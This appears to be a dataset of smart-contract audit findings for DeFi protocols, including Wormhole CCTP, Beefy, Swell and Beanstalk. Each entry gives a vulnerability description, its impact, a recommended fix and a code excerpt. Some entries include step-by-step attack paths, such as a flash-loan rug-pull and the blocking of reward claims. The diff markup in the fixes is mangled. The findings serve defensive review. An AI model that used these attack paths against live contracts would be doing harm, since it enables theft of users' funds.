As such, the risks associated with the deployment of protocol upgrades and the potential time-sensitive nature of this issue designate a low severity issue.\\nProof of Concept:\\nA Governance VAA erroneously registers an emitter with the incorrect foreign chain identifier.\\nA Governance upgrade is now required to re-initialize this state so that the correct foreign chain identifier can be associated with the given emitter address.ч```\\nfunction registerEmitterAndDomain(bytes memory encodedVaa) public {\\n /* snip: parsing of Governance VAA payload */\\n\\n // Set the registeredEmitters state variable.\\n registeredEmitters[foreignChain] = foreignAddress;\\n\\n // update the chainId to domain (and domain to chainId) mappings\\n getChainToDomain()[foreignChain] = cctpDomain;\\n getDomainToChain()[cctpDomain] = foreignChain;\\n}\\n```\\n -Temporary denial-of-service when in-flight messages are not executed before a deprecated Wormhole Guardian set expiresчlowчWormhole exposes a governance action in `Governance::submitNewGuardianSet` to update the Guardian set via Governance VAA.\\n```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n\\nWhen this function is called, `Setters:: expireGuardianSet` initiates a 24-hour timeframe after which the current guardian set expires.\\n```\\nfunction expireGuardianSet(uint32 index) internal {\\n _state.guardianSets[index].expirationTime = uint32(block.timestamp) + 86400;\\n}\\n```\\n\\nHence, any in-flight VAAs that utilize the deprecated Guardian set index will fail to be executed given the validation present in `Messages::verifyVMInternal`.\\n```\\n/// @dev 
Checks if VM guardian set index matches the current index (unless the current set is expired).\\nif(vm.guardianSetIndex != getCurrentGuardianSetIndex() && guardianSet.expirationTime < block.timestamp){\\n return (false, \"guardian set has expired\");\\n}\\n```\\n\\nConsidering there is no automatic relaying of Wormhole CCTP messages, counter to what is specified in the documentation (unless an integrator implements their own relayer), there are no guarantees that an in-flight message which utilizes an old Guardian set index will be executed by the `mintRecipient` on the target domain within its 24-hour expiration period. This could occur, for example, in cases such as:\\nIntegrator messages are blocked by their use of the Wormhole nonce/sequence number.\\nCCTP contracts are paused on the target domain, causing all redemptions to revert.\\nL2 sequencer downtime, since the Wormhole CCTP integration contracts do not consider aliased addresses for forced inclusion.\\nThe `mintRecipient` is a contract that has been paused following an exploit, temporarily restricting all incoming and outgoing transfers.\\nIn the current design, it is not possible to update the `mintRecipient` for a given deposit due to the multicast nature of VAAs. 
CCTP exposes `MessageTransmitter::replaceMessage` which allows the original source caller to update the destination caller for a given message and its corresponding attestation; however, the Wormhole CCTP integration currently provides no access to this function and has no similar functionality of its own to allow updates to the target `mintRecipient` of the VAA.\\nAdditionally, there is no method for forcibly executing the redemption of USDC/EURC to the `mintRecipient`, which is the only address allowed to execute the VAA on the target domain, as validated in `Logic::redeemTokensWithPayload`.\\n```\\n// Confirm that the caller is the `mintRecipient` to ensure atomic execution.\\nrequire(\\n msg.sender.toUniversalAddress() == deposit.mintRecipient, \"caller must be mintRecipient\"\\n);\\n```\\n\\nWithout any programmatic method for replacing expired VAAs with new VAAs signed by the updated Guardian set, the source USDC/EURC will be burnt, but it will not be possible for the expired VAAs to be executed, leading to denial-of-service on the `mintRecipient` receiving tokens on the target domain. The Wormhole CCTP integration does, however, inherit some mitigations already in place for this type of scenario where the Guardian set is updated, as explained in the Wormhole whitepaper, meaning that it is possible to repair or otherwise replace the expired VAA for execution using signatures from the new Guardian set. In all cases, the original VAA metadata remains intact since the new VAA Guardian signatures refer to an event that has already been emitted, so none of the contents of the VAA payload besides the Guardian set index and associated signatures change on re-observation. 
This means that the new VAA can be safely paired with the existing Circle attestation for execution on the target domain by the original `mintRecipient`.чThe practicality of executing the proposed Governance mitigations at scale should be carefully considered, given the extent to which USDC is entrenched within the wider DeFi ecosystem. There is a high likelihood of temporary widespread, high-impact DoS, although this is somewhat limited by the understanding that Guardian set updates are expected to occur relatively infrequently, given there have only been three updates in the lifetime of Wormhole so far. There is also potentially insufficient tooling for the detailed VAA re-observation scenarios, which should handle the recombination of the signed CCTP message with the new VAA and clearly communicate these considerations to integrators.чThere is only a single address that is permitted to execute a given VAA on the target domain; however, there are several scenarios that have been identified where this `mintRecipient` may be unable to perform redemption for a period in excess of 24 hours following an update to the Guardian set while the VAA is in-flight. 
Fortunately, Wormhole Governance has a well-defined path to resolution, so the impact is limited.\\nProof of Concept:\\nAlice burns 100 USDC to be transferred to dApp X from CCTP Domain A to CCTP Domain B.\\nWormhole executes a Governance VAA to update the Guardian set.\\n24 hours pass, causing the previous Guardian set to expire.\\ndApp X attempts to redeem 100 USDC on CCTP Domain B, but VAA verification fails because the message was signed using the expired Guardian set.\\nThe 100 USDC remains burnt and cannot be minted on the target domain by executing the attested CCTP message until the expired VAA is reobserved by members of the new Guardian set.ч```\\nfunction submitNewGuardianSet(bytes memory _vm) public {\\n // rest of code\\n\\n // Trigger a time-based expiry of current guardianSet\\n expireGuardianSet(getCurrentGuardianSetIndex());\\n\\n // Add the new guardianSet to guardianSets\\n storeGuardianSet(upgrade.newGuardianSet, upgrade.newGuardianSetIndex);\\n\\n // Makes the new guardianSet effective\\n updateGuardianSetIndex(upgrade.newGuardianSetIndex);\\n}\\n```\\n -`StrategyPassiveManagerUniswap` gives ERC20 token allowances to `unirouter` but doesn't remove allowances when `unirouter` is updatedчmediumч`StrategyPassiveManagerUniswap` gives ERC20 token allowances to unirouter:\\n```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n\\n`unirouter` is inherited from `StratFeeManagerInitializable` which has an external function `setUnirouter` which allows `unirouter` to be changed:\\n```\\n function setUnirouter(address _unirouter) external onlyOwner {\\n unirouter = _unirouter;\\n emit SetUnirouter(_unirouter);\\n}\\n```\\n\\nThe allowances can only be removed by calling `StrategyPassiveManagerUniswap::panic` however `unirouter` can be changed any time via the `setUnirouter` function.\\nThis allows the contract to 
enter a state where `unirouter` is updated via `setUnirouter` but the ERC20 token approvals given to the old `unirouter` are not removed.ч1) Make `StratFeeManagerInitializable::setUnirouter` `virtual` such that it can be overridden by child contracts. 2) `StrategyPassiveManagerUniswap` should override `setUnirouter` to remove all allowances before calling the parent function to update `unirouter`.чThe old `unirouter` contract will continue to have ERC20 token approvals for `StratFeeManagerInitializable` so it can continue to spend the protocol's tokens when this is not the protocol's intention as the protocol has changed `unirouter`.ч```\\nfunction _giveAllowances() private {\\n IERC20Metadata(lpToken0).forceApprove(unirouter, type(uint256).max);\\n IERC20Metadata(lpToken1).forceApprove(unirouter, type(uint256).max);\\n}\\n```\\n -Owner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens by manipulating `onlyCalmPeriods` parametersчlowчWhile `StrategyPassiveManagerUniswap` does have some permissioned roles, one of the attack paths we were asked to check was that the permissioned roles could not rug-pull the users' deposited tokens. There is a way that the owner of the `StrategyPassiveManagerUniswap` contract could accomplish this by modifying key parameters to reduce the effectiveness of the `_onlyCalmPeriods` check. 
This appears to be how a similar protocol Gamma was exploited.\\nProof of Concept:\\nOwner calls `StrategyPassiveManagerUniswap::setDeviation` to increase the maximum allowed deviations to large numbers or alternatively `setTwapInterval` to decrease the twap interval rendering it ineffective\\nOwner takes a flash loan and uses it to manipulate `pool.slot0` to a high value\\nOwner calls `BeefyVaultConcLiq::deposit` to perform a deposit; the shares are calculated thus:\\n```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n\\nAs `price` is derived from `pool.slot0` which has been inflated, the owner will receive many more shares than they normally would\\nOwner unwinds the flash loan returning `pool.slot0` back to its normal value\\nOwner calls `BeefyVaultConcLiq::withdraw` to receive many more tokens than they should be able to due to the inflated share count they received from the depositчBeefy already intends to have all owner functions behind a timelocked multi-sig and if these transactions are attempted the suspicious parameters would be an obvious signal that a future attack is coming. Because of this the probability of this attack being effectively executed is low though it is still possible.\\nOne way to further mitigate this attack would be to have a minimum required twap interval and maximum required deviation amounts such that the owner couldn't change these parameters to values which would enable this attack.чOwner of `StrategyPassiveManagerUniswap` can rug-pull users' deposited tokens.ч```\\n// @audit `price` is derived from `pool.slot0`\\nshares = _amount1 + (_amount0 * price / PRECISION);\\n```\\n -`_onlyCalmPeriods` does not consider MIN/MAX ticks, which can DOS deposit, withdraw and harvest in edge casesчlowчIn Uniswap V3 liquidity providers can only provide liquidity between price ranges `[1.0001^{MIN_ TICK};1.0001^{MAX_TICK})`. 
Therefore these are the min and max prices.\\n```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n\\nIf `twapTick - maxTickDeviationNegative < MIN_TICK`, this function would revert even if `tick` has been the same for years. This can DOS deposits, withdrawals and harvests when they should be allowed for as long as the state holds.чConsider changing the current implementation to:\\n```\\n// Add the line below\\n const int56 MIN_TICK = // Remove the line below\\n887272;\\n// Add the line below\\n const int56 MAX_TICK = 887272;\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n// Add the line below\\n int56 minCalmTick = max(twapTick // Remove the line below\\n maxTickDeviationNegative, MIN_TICK);\\n// Add the line below\\n int56 maxCalmTick = min(twapTick // Remove the line below\\n maxTickDeviationPositive, MAX_TICK);\\n\\n if(\\n// Remove the line below\\n twapTick // Remove the line below\\n maxTickDeviationNegative > tick ||\\n// Remove the line below\\n twapTick // Add the line below\\n maxTickDeviationPositive < tick) revert NotCalm();\\n// Add the line below\\n minCalmTick > tick ||\\n// Add the line below\\n maxCalmTick < tick) revert NotCalm();\\n }\\n```\\nчч```\\n function _onlyCalmPeriods() private view {\\n int24 tick = currentTick();\\n int56 twapTick = twap();\\n\\n if(\\n twapTick - maxTickDeviationNegative > tick ||\\n twapTick + maxTickDeviationPositive < tick) revert NotCalm();\\n }\\n```\\n -Withdraw can return zero tokens while burning a positive amount of sharesчlowчInvariant fuzzing found an edge-case where a user could burn an amount of shares > 0 but receive zero output tokens. 
The cause appears to be a rounding down to zero precision loss for small `_shares` value in `BeefyVaultConcLiq::withdraw` L220-221:\\n```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\nчChange the slippage check to also revert if no output tokens are returned:\\n```\\nif (_amount0 < _minAmount0 || _amount1 < _minAmount1 ||\\n (_amount0 == 0 && _amount1 == 0)) revert TooMuchSlippage();\\n```\\nчProtocol can enter a state where a user burns their shares but receives zero output tokens in return.\\nProof of Concept: Invariant fuzz testing suite supplied at the conclusion of the audit.ч```\\nuint256 _amount0 = (_bal0 * _shares) / _totalSupply;\\nuint256 _amount1 = (_bal1 * _shares) / _totalSupply;\\n```\\n -`SwellLib.BOT` can subtly rug-pull withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`чmediumчWhen users create a withdrawal request, their `swETH` is burned then the current exchange rate `rateWhenCreated` is fetched from swETH::swETHToETHRate:\\n```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n\\nHowever `SwellLib.BOT` can pass an arbitrary value for `_processedRate` when calling swEXIT::processWithdrawals:\\n```\\nfunction processWithdrawals(\\n uint256 _lastTokenIdToProcess,\\n uint256 _processedRate\\n) external override checkRole(SwellLib.BOT) {\\n```\\n\\nThe final rate used is the lesser of `rateWhenCreated` and _processedRate:\\n```\\nuint256 finalRate = _processedRate > rateWhenCreated\\n ? 
rateWhenCreated\\n : _processedRate;\\n```\\n\\nThis final rate is multiplied by the requested withdrawal amount to determine the actual amount sent to the user requesting a withdrawal:\\n```\\nuint256 requestExitedETH = wrap(amount).mul(wrap(finalRate)).unwrap();\\n```\\n\\nHence `SwellLib.BOT` can subtly rug-pull all withdrawals by setting `_processedRate = 0` when calling `swEXIT::processWithdrawals`.чTwo possible mitigations:\\nChange `swEXIT::processWithdrawals` to always fetch the current rate from `swETH::swETHToETHRate`\\nOnly allow `swEXIT::processWithdrawals` to be called by the `RepricingOracle` contract which calls it correctly.чч```\\nuint256 rateWhenCreated = AccessControlManager.swETH().swETHToETHRate();\\n```\\n -Check for staleness of data when fetching Proof of Reserves via Chainlink `Swell ETH PoR` Oracleчlowч`RepricingOracle::_assertRepricingSnapshotValidity` uses the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle to fetch an off-chain data source for Swell's current reserves.\\nThe Oracle `Swell ETH PoR` is listed on Chainlink's website as having a heartbeat of `86400` seconds (check the \"Show More Details\" box in the top-right corner of the table), however no staleness check is implemented by RepricingOracle:\\n```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\nчImplement a staleness check and if the Oracle is stale, either revert or skip using it as the code currently does if the oracle is not set.\\nFor multi-chain deployments ensure that a correct staleness check is used for each feed as the same feed can have different heartbeats on different chains.\\nConsider adding an off-chain bot that periodically checks if the Oracle has become stale and if it has, raises an internal alert for the team to investigate.чIf the `Swell ETH PoR` Chainlink Proof Of Reserves Oracle has stopped functioning correctly, 
`RepricingOracle::_assertRepricingSnapshotValidity` will continue processing with stale reserve data as if it were fresh.ч```\\n// @audit no staleness check\\n(, int256 externallyReportedV3Balance, , , ) = AggregatorV3Interface(\\n ExternalV3ReservesPoROracle\\n).latestRoundData();\\n```\\n -Precision loss in `swETH::_deposit` from unnecessary hidden division before multiplicationчlowч`swETH::_deposit` L170 contains a hidden unnecessary division before multiplication as the call to `_ethToSwETHRate` performs a division which then gets multiplied by msg.value:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n\\nThis issue has not been introduced in the new changes but is in the mainnet code.чRefactor to perform multiplication before division:\\n```\\nuint256 swETHAmount = wrap(msg.value).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n```\\nчSlightly less `swETH` will be minted to depositors. 
While the amount by which individual depositors are short-changed is individually small, the effect is cumulative and increases as depositors and deposit size increase.\\nProof of Concept: This stand-alone stateless fuzz test can be run inside Foundry to prove this as well as provided hard-coded test cases:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.23;\\n\\nimport {UD60x18, wrap} from \"@prb/math/src/UD60x18.sol\";\\n\\nimport \"forge-std/Test.sol\";\\n\\n// run from base project directory with:\\n// (fuzz test) forge test --match-test FuzzMint -vvv\\n// (hardcoded) forge test --match-test HardcodedMint -vvv\\ncontract MintTest is Test {\\n\\n uint256 private constant SWETH_ETH_RATE = 1050754209601187151; //as of 2024-02-15\\n\\n function _mintOriginal(uint256 inputAmount) private pure returns(uint256) {\\n // hidden division before multiplication\\n // wrap(inputAmount).mul(_ethToSwETHRate()).unwrap();\\n // wrap(inputAmount).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap()\\n\\n return wrap(inputAmount).mul(wrap(1 ether).div(wrap(SWETH_ETH_RATE))).unwrap();\\n }\\n\\n function _mintFixed(uint256 inputAmount) private pure returns(uint256) {\\n // refactor to perform multiplication before division\\n // wrap(inputAmount).mul(wrap(1 ether)).div(_swETHToETHRate()).unwrap();\\n\\n return wrap(inputAmount).mul(wrap(1 ether)).div(wrap(SWETH_ETH_RATE)).unwrap();\\n }\\n\\n function test_FuzzMint(uint256 inputAmount) public pure {\\n uint256 resultOriginal = _mintOriginal(inputAmount);\\n uint256 resultFixed = _mintFixed(inputAmount);\\n\\n assert(resultOriginal == resultFixed);\\n }\\n\\n function test_HardcodedMint() public {\\n // found by fuzzer\\n console.log(_mintFixed(3656923177187149889) - _mintOriginal(3656923177187149889)); // 1\\n\\n // 100 eth\\n console.log(_mintFixed(100 ether) - _mintOriginal(100 ether)); // 21\\n\\n // 1000 eth\\n console.log(_mintFixed(1000 ether) - _mintOriginal(1000 ether)); // 215\\n\\n // 10000 eth\\n 
console.log(_mintFixed(10000 ether) - _mintOriginal(10000 ether)); // 2159\\n }\\n}\\n```\\nч```\\nuint256 swETHAmount = wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// @audit expanding this out\\n// wrap(msg.value).mul(_ethToSwETHRate()).unwrap();\\n// wrap(msg.value).mul(wrap(1 ether).div(_swETHToETHRate())).unwrap();\\n```\\n -Attacker can abuse `RewardsDistributor::triggerRoot` to block reward claims and unpause a paused stateчmediumчConsider the code of RewardsDistributor::triggerRoot:\\n```\\n function triggerRoot() external {\\n bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n\\nThis function:\\ncan be called by anyone\\nif it succeeds, sets `root.value` to `rootCandidateA.value` and `root.lastUpdatedAt` to `block.timestamp`\\ndoesn't reset `rootCandidateA` or `rootCandidateB`, so it can be called over and over again to continually update `root.lastUpdatedAt` or to set `root.value` to `rootCandidateA.value`.чTwo possible options:\\nMake `RewardsDistributor::triggerRoot` a permissioned function such that an attacker can't call it\\nChange `RewardsDistributor::triggerRoot` to reset `rootCandidateA.value = zeroRoot` such that it can't be successfully called repeatedly.чAn attacker can abuse this function in 2 ways:\\nby calling it repeatedly an attacker can continually increase `root.lastUpdatedAt` to trigger the claim delay revert in `RewardsDistributor::claimAll` effectively blocking reward claims\\nby calling it after reward claims have been paused, an attacker can effectively unpause the paused state since `root.value` is over-written with the valid value from `rootCandidateA.value` and claim pausing works by setting `root.value == zeroRoot`.ч```\\n function triggerRoot() external {\\n 
bytes32 rootCandidateAValue = rootCandidateA.value;\\n if (rootCandidateAValue != rootCandidateB.value || rootCandidateAValue == bytes32(0)) revert RootCandidatesInvalid();\\n root = Root({value: rootCandidateAValue, lastUpdatedAt: block.timestamp});\\n emit RootChanged(msg.sender, rootCandidateAValue);\\n }\\n```\\n -`RewardsDistributor` doesn't correctly handle deposits of fee-on-transfer incentive tokensчmediumч`the kenneth` stated in telegram that Fee-On-Transfer tokens are fine to use as incentive tokens with `RewardsDistributor`, however when receiving Fee-On-Transfer tokens and storing the reward amount the accounting does not account for the fee deducted from the transfer amount in-transit, for example:\\n```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\nчIn `RewardsDistributor::_depositLPIncentive` & depositVoteIncentive:\\nread the `before` transfer token balance of `RewardsDistributor` contract\\nperform the token transfer\\nread the `after` transfer token balance of `RewardsDistributor` contract\\ncalculate the difference between the `after` and `before` balances to get the true amount that was received by the `RewardsDistributor` contract accounting for the fee that was deducted in-transit\\nuse the true received amount to generate events and write the received incentive token amounts to `RewardsDistributor::periodRewards`.\\nAlso note that `RewardsDistributor::periodRewards` is never read in the contract, only written to. 
If it is not used by off-chain processing then consider removing it.чThe actual reward calculation is done off-chain and is outside the audit scope nor do we have visibility of that code. But events emitted by `RewardsDistributor` and the stored incentive token deposits in `RewardsDistributor::periodRewards` use incorrect amounts for Fee-On-Transfer incentive token deposits.ч```\\nfunction _depositLPIncentive(\\n StoredReward memory reward,\\n uint256 amount,\\n uint256 periodReceived\\n) private {\\n IERC20(reward.token).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n\\n // @audit stored `amount` here will be incorrect since it doesn't account for\\n // the actual amount received after the transfer fee was deducted in-transit\\n _storeReward(periodReceived, reward, amount);\\n}\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sent, ) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), _to, _amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert FailedToSendEther();\\n```\\nчContract unnecessarily exposed to gas griefing attacks.ч```\\n(bool sent, ) = _to.call{value: _amount}(\"\");\\nrequire(sent);\\n```\\n -No precision scaling or minimum received amount check when subtracting `relayerFeeAmount` can revert due to underflow or return less tokens to user than specifiedчmediumч`PorticoFinish::payOut` L376 attempts to subtract the `relayerFeeAmount` from the final post-bridge and post-swap token balance:\\n```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n\\nThere is no precision scaling to ensure that PorticoFinish's token contract balance and `relayerFeeAmount` are in the same decimal precision; if the `relayerFeeAmount` has 18 decimal places but the token is USDC with only 6 decimal places, this can easily revert due to underflow resulting in the bridged tokens being stuck.\\nAn excessively high `relayerFeeAmount` could also significantly reduce the amount of post-bridge and post-swap tokens received as there is no check on the minimum amount of tokens the user will receive after deducting `relayerFeeAmount`. 
This current configuration is an example of the \"MinTokensOut For Intermediate, Not Final Amount\" vulnerability class; as the minimum received tokens check is before the deduction of `relayerFeeAmount` a user will always receive less tokens than their specified minimum if `relayerFeeAmount > 0`.чEnsure that token balance and `relayerFeeAmount` have the same decimal precision before combining them. Alternatively check for underflow and don't charge a fee if this would be the case. Consider enforcing the user-specified minimum output token check again when deducting `relayerFeeAmount`, and if this would fail then decrease `relayerFeeAmount` such that the user at least receives their minimum specified token amount.\\nAnother option is to check that even if it doesn't underflow, that the remaining amount after subtracting `relayerFeeAmount` is a high percentage of the bridged amount; this would prevent a scenario where `relayerFeeAmount` takes a large part of the bridged amount, effectively capping `relayerFeeAmount` to a tiny % of the post-bridge and post-swap funds. This scenario can still result in the user receiving less tokens than their specified minimum however.\\nFrom the point of view of the smart contract, it should protect itself against the possibility of the token amount and `relayerFeeAmount` being in different decimals or that `relayerFeeAmount` would be too high, similar to how for example L376 inside `payOut` doesn't trust the bridge reported amount and checks the actual token balance.чBridged tokens stuck or user receives less tokens than their specified minimum.ч```\\nfinalUserAmount = finalToken.balanceOf(address(this)) - relayerFeeAmount;\\n```\\n -Use low level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. 
For example:\\n```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n\\nIs the same as writing:\\n```\\n(bool sentToUser, bytes memory data) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n\\nIn both cases the returned data will be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not used at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), recipient, finalUserAmount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.чContract unnecessarily exposed to gas griefing attacks.ч```\\n(bool sentToUser, ) = recipient.call{ value: finalUserAmount }(\"\");\\nrequire(sentToUser, \"Failed to send Ether\");\\n```\\n -The previous milestone stem should be scaled for use with the new gauge point system which uses untruncated values moving forwardчhighчWithin the Beanstalk Silo, the milestone stem for a given token is the cumulative amount of grown stalk per BDV for this token at the last `stalkEarnedPerSeason` update. Previously, the milestone stem was stored in its truncated representation; however, the seed gauge system now stores the value in its untruncated form due to the new granularity of grown stalk and the frequency with which these values are updated.\\nAt the time of upgrade, the previous (truncated) milestone stem for each token should be scaled for use with the gauge point system by multiplying up by a factor of `1e6`. 
Otherwise, there will be a mismatch in decimals when calculating the stem tip.\\n```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\nчScale up the existing milestone stem for each token:\\n```\\nfor (uint i = 0; i < siloTokens.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n s.ss[siloTokens[i]].milestoneStem = int96(s.ss[siloTokens[i]].milestoneStem.mul(1e6));\\n```\\n\\n\\clearpageчThe mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestonStem(token) + (current \\ season - getMilestonStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. 
Notably, the milestone stem is now stored with 10 decimals (untruncated), hence why the second term of the abstraction has omitted the `10^{6}` division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not escalated by $10^{6}$ then the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This is mandatory to be handled within the upgrade otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.ч```\\n_stemTipForToken = s.ss[token].milestoneStem +
zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to ensure both reserves are non-zero to avoid a potential division by zero `reserve1` when calculating the price as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // if the length of twaReserves is 0, then return 0.\\n // the length of twaReserves should never be 1, but\\n // is added for safety.\\n if (twaReserves.length < 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n } else {\\n // safeCast not needed as the reserves are uint128 in the wells.\\n s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less-than or equal-to 1.ч```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\nчч```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = 
LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n -Small unripe token withdrawals don't decrease BDV and StalkчlowчFor any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\nч`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating 